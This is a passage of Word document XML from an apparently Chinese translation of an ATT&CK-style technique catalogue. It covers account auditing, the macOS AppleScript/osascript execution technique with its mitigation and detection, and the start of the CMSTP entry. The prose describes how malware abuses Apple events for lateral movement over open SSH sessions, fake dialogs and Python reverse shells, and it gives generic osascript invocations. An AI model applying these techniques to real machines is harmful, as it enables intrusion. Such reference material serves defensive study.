          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>所创建的账号。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="high-light-bg4"/>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账号审核</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="high-light-bg4"/>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>还可以包括</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="high-light-bg4"/>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="high-light-bg4"/>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>是否激活了默认账号（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="high-light-bg4"/>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访客</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="high-light-bg4"/>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>审核</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>还应包括检查</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>设备和应用的默认凭据或</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>密钥</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一旦</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>发现，应立即更新。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742EE1FA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665"/>
    <w:p w14:paraId="33F125DB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00BA6351">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc518390338"/>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45461CC6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>AppScript</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="5A5F2D90" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DCAA615" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>编号</w:t>
            </w:r>
            <w:r>
              <w:t>: T1155</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5252386A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>横向移动</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="374B0A9B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>平台：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54E2BCD1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>普通用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="197275F8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>数据源：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> API </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统调用</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程监控</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57246EFA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>支持远程</w:t>
            </w:r>
            <w:r w:rsidRPr="00DD299E">
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BC25C64" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CB1C3B" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>版本：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1063C0DC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DEA7FB4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00C12DB0" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00C12DB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MacOS</w:t>
      </w:r>
      <w:r w:rsidRPr="00C12DB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00C12DB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OS X</w:t>
      </w:r>
      <w:r w:rsidRPr="00C12DB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的应用程序在进程间通信时相互发送</w:t>
      </w:r>
      <w:r w:rsidRPr="00C12DB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Apple</w:t>
      </w:r>
      <w:r w:rsidRPr="00C12DB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事件消息，用</w:t>
      </w:r>
      <w:r w:rsidRPr="00C12DB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AppScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实现的脚本可以很容易的</w:t>
      </w:r>
      <w:r w:rsidRPr="00C12DB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为本地或远程</w:t>
      </w:r>
      <w:r w:rsidRPr="00C12DB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IPC</w:t>
      </w:r>
      <w:r w:rsidRPr="00C12DB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而发送此类消息。</w:t>
      </w:r>
      <w:r w:rsidRPr="00C12DB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Osascript</w:t>
      </w:r>
      <w:r w:rsidRPr="00C12DB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00C12DB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AppScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00C12DB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或其它符合开放脚本架构</w:t>
      </w:r>
      <w:r w:rsidRPr="00C12DB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(OSA)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C12DB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语言的脚本。通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00C12DB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>osalang</w:t>
      </w:r>
      <w:r w:rsidRPr="00C12DB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序可以获取系统安装的</w:t>
      </w:r>
      <w:r w:rsidRPr="00C12DB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OSA</w:t>
      </w:r>
      <w:r w:rsidRPr="00C12DB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语言列表。</w:t>
      </w:r>
      <w:r w:rsidRPr="00C12DB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Apple</w:t>
      </w:r>
      <w:r w:rsidRPr="00C12DB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事件消息可被作为此类脚本的一部分发送，也可被独立发送。此类事件消息可用于定位打开的窗口，触发按键，并以本地或远程的方式和任何运行中的应用程序交互。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0831F6AF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00C12DB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恶意程序使用该机制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以</w:t>
      </w:r>
      <w:r w:rsidRPr="00C12DB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已</w:t>
      </w:r>
      <w:r w:rsidRPr="00C12DB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开的</w:t>
      </w:r>
      <w:r w:rsidRPr="00C12DB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:r w:rsidRPr="00C12DB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接，横向移动到其它机器，甚至给用户展示一个伪造的对话框。此类事件不能启动位于其它机器的应用程序（虽然它可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动本地程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00C12DB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），但是它们可以和远程已在运行的程序交互。由于是脚本语言，它可以被利用来触发其它更常见的技术</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00C12DB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00C12DB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r w:rsidRPr="00C12DB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的反弹</w:t>
      </w:r>
      <w:r w:rsidRPr="00C12DB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00C12DB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。通过命令行执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00C12DB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>osa</w:t>
      </w:r>
      <w:r w:rsidRPr="00C12DB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>osascript /path/to/script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>osascript -e "script here"</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C12DB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以启动一个脚本运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD14653" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2263"/>
        <w:gridCol w:w="7473"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00A21B67" w14:paraId="7FD7FDF2" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="1A83EB8B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7473" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="51F0040B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00CB1C3B" w14:paraId="4595771D" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C3638F5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CB1C3B" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB1C3B">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>代码签名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6733D536" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CB1C3B" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00CB1C3B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>要求所有的</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1C3B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>AppleScript</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1C3B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在执行前都被可信的开发者</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1C3B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1C3B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>签名，这可以阻止无签名的</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1C3B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>AppleScript</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1C3B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行。此举措和</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1C3B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Gatekeeper</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1C3B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>审查</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1C3B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1C3B">
              <w:t>app</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1C3B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件的目的类似。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A875A06" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CB1C3B" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="120772B2" w14:textId="3AE0CC37" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C7E45D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>监控系统中其它疑似行为的机制可用于监控通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>osascript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>AppleScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0990AB7D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:lastRenderedPageBreak/>
        <w:t>CMSTP</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="36AD8E00" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E0F9CE0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编号</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1191</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0801F546" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>逃逸</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>执行</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E2B453D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D0C0196" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
